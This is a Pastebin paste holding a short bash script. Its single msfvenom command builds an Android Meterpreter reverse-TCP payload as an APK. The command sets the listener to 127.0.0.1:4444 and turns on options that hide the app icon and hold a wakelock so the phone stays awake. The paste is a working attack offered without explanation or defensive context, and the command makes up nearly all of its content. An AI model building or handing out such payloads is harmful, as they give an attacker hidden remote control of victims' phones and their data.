Advertisement
rc-chuah

metasploitapk2

Oct 5th, 2020
249
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.21 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 --platform android --arch dalvik AndroidHideAppIcon=true AndroidMeterpreterDebug=true AndroidWakelock=true -o metasploit.apk
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement